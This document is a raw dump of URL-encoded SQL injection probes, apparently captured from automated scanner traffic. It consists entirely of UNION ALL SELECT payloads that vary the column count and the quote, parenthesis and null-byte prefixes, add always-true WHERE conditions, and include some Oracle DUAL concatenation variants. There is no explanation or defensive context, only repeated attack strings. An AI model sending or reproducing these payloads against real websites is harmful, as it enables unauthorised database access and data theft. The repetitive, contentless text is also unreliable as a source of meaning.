-6566%00%27%29%20UNION%20ALL%20SELECT%209537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%23 -2620%00%27%29%20UNION%20ALL%20SELECT%207495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%23 -2639%00%27%29%20UNION%20ALL%20SELECT%201719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%2C1719%23 -7665%00%27%20UNION%20ALL%20SELECT%204299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%2C4299%23 -2079%00%27%20UNION%20ALL%20SELECT%205749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%2C5749%23 -7403%00%27%20UNION%20ALL%20SELECT%201809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%23 -1485%00%27%20UNION%20ALL%20SELECT%206211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%23 -5470%00%27%20UNION%20ALL%20SELECT%208257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%2C8257%23 -7455%00%27%20UNION%20ALL%20SELECT%201999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%23 -1927%00%27%20UNION%20ALL%20SELECT%207007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%2C7007%23 -5667%00%27%20UNION%20ALL%20SELECT%201968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%2C1968%23 -5751%00%27%20UNION%20ALL%20SELECT%207293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%23 -8937%00%27%20UNION%20ALL%20SELECT%203844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%23 -4791%27%29%20WHERE%201001%3D1001%20UNION%20ALL%20SELECT%201001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%2C1001%23 -5762%27%29%20WHERE%206604%3D6604%20UNION%20ALL%20SELECT%206604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%23 -5546%27%29%20WHERE%207293%3D7293%20UNION%20ALL%20SELECT%207293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%23 -3552%27%29%20WHERE%206959%3D6959%20UNION%20ALL%20SELECT%206959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%2C6959%23 -9331%27%29%20WHERE%203667%3D3667%20UNION%20ALL%20SELECT%203667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%2C3667%23 -7558%27%29%20WHERE%203476%3D3476%20UNION%20ALL%20SELECT%203476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%23 -9265%27%29%20WHERE%202653%3D2653%20UNION%20ALL%20SELECT%202653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%2C2653%23 -1360%27%29%20WHERE%205780%3D5780%20UNION%20ALL%20SELECT%205780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%23 -8230%27%29%20WHERE%205107%3D5107%20UNION%20ALL%20SELECT%205107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%23 -3799%27%29%20WHERE%208826%3D8826%20UNION%20ALL%20SELECT%208826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%23 -2239%22%29%20WHERE%203968%3D3968%20UNION%20ALL%20SELECT%203968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%2C3968%23 -4382%22%29%20WHERE%208042%3D8042%20UNION%20ALL%20SELECT%208042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%23 -8997%22%29%20WHERE%209479%3D9479%20UNION%20ALL%20SELECT%209479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%23 -1791%22%29%20WHERE%202916%3D2916%20UNION%20ALL%20SELECT%202916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%23 -9162%22%29%20WHERE%205460%3D5460%20UNION%20ALL%20SELECT%205460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%2C5460%23 -5230%22%29%20WHERE%206884%3D6884%20UNION%20ALL%20SELECT%206884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%2C6884%23 -9322%22%29%20WHERE%201308%3D1308%20UNION%20ALL%20SELECT%201308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%2C1308%23 -6490%22%29%20WHERE%205627%3D5627%20UNION%20ALL%20SELECT%205627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%23 -7711%22%29%20WHERE%203261%3D3261%20UNION%20ALL%20SELECT%203261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%2C3261%23 -7495%22%29%20WHERE%207761%3D7761%20UNION%20ALL%20SELECT%207761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%23 -2898%27%20WHERE%204756%3D4756%20UNION%20ALL%20SELECT%204756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%2C4756%23 -8024%27%20WHERE%204072%3D4072%20UNION%20ALL%20SELECT%204072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%23 -8953%27%20WHERE%201353%3D1353%20UNION%20ALL%20SELECT%201353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%23 -9818%27%20WHERE%206862%3D6862%20UNION%20ALL%20SELECT%206862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%23 -9418%27%20WHERE%204179%3D4179%20UNION%20ALL%20SELECT%204179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%2C4179%23 -6870%27%20WHERE%202380%3D2380%20UNION%20ALL%20SELECT%202380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%2C2380%23 -6245%27%20WHERE%203081%3D3081%20UNION%20ALL%20SELECT%203081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%2C3081%23 -9125%27%20WHERE%209797%3D9797%20UNION%20ALL%20SELECT%209797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%2C9797%23 -5573%27%20WHERE%201155%3D1155%20UNION%20ALL%20SELECT%201155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%2C1155%23 -8761%27%20WHERE%209188%3D9188%20UNION%20ALL%20SELECT%209188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%2C9188%23 -2747%22%20WHERE%203373%3D3373%20UNION%20ALL%20SELECT%203373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%2C3373%23 -9686%22%20WHERE%205911%3D5911%20UNION%20ALL%20SELECT%205911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%2C5911%23 -6826%22%20WHERE%204609%3D4609%20UNION%20ALL%20SELECT%204609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%23 -7528%22%20WHERE%208404%3D8404%20UNION%20ALL%20SELECT%208404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%2C8404%23 -7951%22%20WHERE%204304%3D4304%20UNION%20ALL%20SELECT%204304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%2C4304%23 -7451%22%20WHERE%208696%3D8696%20UNION%20ALL%20SELECT%208696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%23 -1679%22%20WHERE%202095%3D2095%20UNION%20ALL%20SELECT%202095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%23 -6369%22%20WHERE%204892%3D4892%20UNION%20ALL%20SELECT%204892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%23 -1871%22%20WHERE%209750%3D9750%20UNION%20ALL%20SELECT%209750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%23 -5802%22%20WHERE%203712%3D3712%20UNION%20ALL%20SELECT%203712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%2C3712%23 -2619%27%7C%7C%28SELECT%20%27WLEd%27%20FROM%20DUAL%20WHERE%204867%3D4867%20UNION%20ALL%20SELECT%204867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%2C4867%23 -8439%27%7C%7C%28SELECT%20%27IgyH%27%20FROM%20DUAL%20WHERE%201048%3D1048%20UNION%20ALL%20SELECT%201048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%2C1048%23 -8601%27%7C%7C%28SELECT%20%27zzaJ%27%20FROM%20DUAL%20WHERE%207311%3D7311%20UNION%20ALL%20SELECT%207311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%23 